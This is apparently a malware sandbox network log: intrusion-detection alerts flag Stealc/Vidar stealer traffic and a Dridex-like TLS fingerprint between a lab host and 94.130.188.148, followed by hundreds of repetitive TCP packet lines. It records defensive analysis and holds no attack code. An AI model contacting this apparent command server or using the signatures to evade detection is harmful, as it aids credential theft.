2024-08-29T20:49:35.389430+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59946 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:28.638207+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 59942 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:28.638383+0200 | TCP | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 443 | 59942 | 94.130.188.148 | 192.168.2.5
2024-08-29T20:49:39.983960+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59949 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:43.989360+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59951 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:53.730356+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59956 | 443 | 192.168.2.5 | 94.130.188.148
                                                                                      Aug 29, 2024 20:49:30.148149014 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.148216963 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.148436069 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307060003 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307116032 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.307282925 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307430029 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307439089 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.307728052 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307742119 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.969070911 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.969182014 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.969788074 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.969799042 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.971662998 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.971669912 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440427065 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440447092 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440494061 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440506935 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440535069 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440550089 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440550089 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440556049 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440587044 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440587044 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471681118 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471694946 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471739054 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471749067 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471775055 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471784115 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.538400888 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538420916 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538511038 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.538536072 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538583040 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.569622040 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569642067 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569731951 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.569766045 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569809914 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.608186007 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608201981 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608300924 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.608310938 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608352900 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.633101940 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633130074 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633218050 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.633228064 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633287907 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.656523943 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656541109 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656626940 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.656640053 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656682968 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.667865992 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667882919 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667948961 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.667959929 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667998075 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.685590029 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685606956 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685693979 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.685702085 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685739994 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.703294992 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703309059 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703388929 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.703397036 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703439951 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.717611074 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717626095 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717706919 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.717713118 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717751980 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.735733032 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735748053 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735841990 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.735848904 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735908985 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.747674942 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747689962 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747771978 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.747778893 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747819901 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.756047964 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756062984 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756129980 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.756138086 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756172895 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.765659094 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765674114 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765733004 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.765741110 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765774012 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.782778025 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782793045 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782852888 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.782861948 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782898903 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.785614014 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785628080 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785696030 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.785703897 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785742998 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.791790009 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791804075 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791882992 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.791896105 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791932106 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.806210041 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806224108 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806287050 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.806294918 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806333065 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.819514990 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.819529057 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.819606066 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.819622040 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.819662094 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.832705021 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.832717896 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.832789898 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.832804918 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.832844973 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.841767073 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.841779947 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.841955900 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.841967106 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.842011929 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.851865053 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.851877928 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.851952076 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.851960897 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.851999044 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.861083031 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.861100912 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.861180067 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.861188889 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.861226082 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.869035006 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.869049072 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.869107962 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.869115114 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.869153023 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.877373934 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.877388954 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.877471924 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.877482891 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.877521992 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.894635916 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.894649982 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.894738913 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.894752026 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.894793987 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.914982080 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.914997101 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.915256977 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.915266037 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.915309906 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.926738977 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.926753044 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.926815987 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.926824093 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.926857948 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.930398941 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.930413008 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.930474043 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.930481911 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.930516958 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.940438986 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.940469980 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.940525055 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.940534115 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.940572977 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.949501038 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.949522972 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.949577093 CEST59944443192.168.2.594.130.188.148
Aug 29, 2024 20:49:31.949584961 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.949625015 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.958661079 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.958677053 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.958735943 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.958759069 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.958801985 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.969140053 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.969156027 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.969322920 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.969338894 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.969381094 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.983824015 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.983840942 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.983911991 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:31.983927011 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:31.983966112 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.006196022 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.006211996 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.006278992 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.006289005 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.006329060 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.015331030 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.015348911 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.015398979 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.015407085 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.015455961 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.020150900 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.020168066 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.020207882 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.020215988 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.020241976 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.020251036 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.030008078 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.030024052 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.030071020 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.030078888 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.030123949 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.046225071 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.046253920 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.046304941 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.046314001 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.046339989 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.046348095 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.049643040 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.049659014 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.049711943 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.049719095 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.049762011 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.057492018 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.057507992 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.057563066 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.057569981 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.057605028 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.072416067 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.072434902 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.072469950 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.072478056 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.072500944 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.072510958 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.095350027 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.095362902 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.095415115 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.095423937 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.095458984 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.103811026 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.103825092 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.103873968 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.103888988 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.103928089 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.117176056 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.117192984 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.117238998 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.117249966 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.117260933 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.117285013 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.119091988 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.119110107 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.119158030 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.119165897 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.119199991 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.134538889 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.134574890 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.134624004 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.134633064 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.134669065 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.137970924 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.137984991 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.138035059 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.138042927 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.138076067 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.147170067 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.147183895 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.147229910 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.147238016 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.147274017 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.161365032 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.161381960 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.161425114 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.161433935 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.161453009 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.161469936 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.183939934 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.183953047 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.184010029 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.184019089 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.184050083 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.192492962 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.192506075 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.192553043 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.192562103 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.192595959 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.205739975 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.205751896 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.205792904 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.205826998 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.205832005 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.205862999 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.207865000 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.207878113 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.207938910 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.207947016 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.207984924 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.223144054 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.223157883 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.223263025 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.223295927 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.223337889 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.227669001 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.227682114 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.227845907 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.227854013 CEST  443    59944  94.130.188.148  192.168.2.5
Aug 29, 2024 20:49:32.227891922 CEST  59944  443    192.168.2.5     94.130.188.148
Aug 29, 2024 20:49:32.236113071 CEST  443    59944  94.130.188.148  192.168.2.5
